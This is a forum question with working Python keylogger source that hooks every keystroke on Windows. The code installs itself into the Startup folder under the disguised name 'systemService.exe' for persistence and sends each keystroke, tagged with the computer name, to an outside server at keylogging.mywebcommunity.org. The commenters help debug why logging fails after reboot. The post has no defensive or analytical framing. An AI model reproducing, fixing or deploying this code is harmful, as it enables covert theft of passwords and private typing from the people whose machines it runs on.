# Python Keylogger

Tags: windows-7, python, keylogger

I am trying to make a python keylogger which automatically runs at startup.
Here is the python code

```
import pyHook, pythoncom, os, httplib, urllib, getpass, shutil, sys

userName = getpass.getuser()
filePath = "C:\users\%s\AppData\Roaming\Microsoft\windows\Start Menu\Programs\Startup\\" %userName

if os.path.exists(filePath):
    if os.path.isfile(filePath+'systemService.exe')==False:
        try:
            shutil.copy2(sys.argv[0],filePath+'systemService.exe')
        except:
            pass
def OnKeyBoardEvent(event):
    try:
        params = urllib.urlencode({'pcName': os.environ['COMPUTERNAME'], 'toLog': chr(event.Ascii)})
        conn = httplib.HTTPConnection("keylogging.mywebcommunity.org")
        conn.request("GET","/index.php?"+params)
    except:
        pass
    return True
hook_manager = pyHook.HookManager()
hook_manager.KeyDown = OnKeyBoardEvent
hook_manager.HookKeyboard()
pythoncom.PumpMessages()
```

This keylogger logs all ascii data to the server named in the code using php.It works fine when i executed this pyw file but when i reboots the pc it doesn't log into the file on server. I doubled checked that this program is present in Startup Directory and is running in background after rebooting. But still not logging data on to the server file.

Comment: Does it log to a local file OK after reboot?

Comment: Try making a .bat file with the correct command to run the file and run that on startup. There might be a few arguments that aren't being run correctly for the file, resulting it in having errors. To test that, I'd reccommend putting a `try: #code except: open("somefile","w").write("error")` to make sure program is running into an exception somewhere but ignoring it.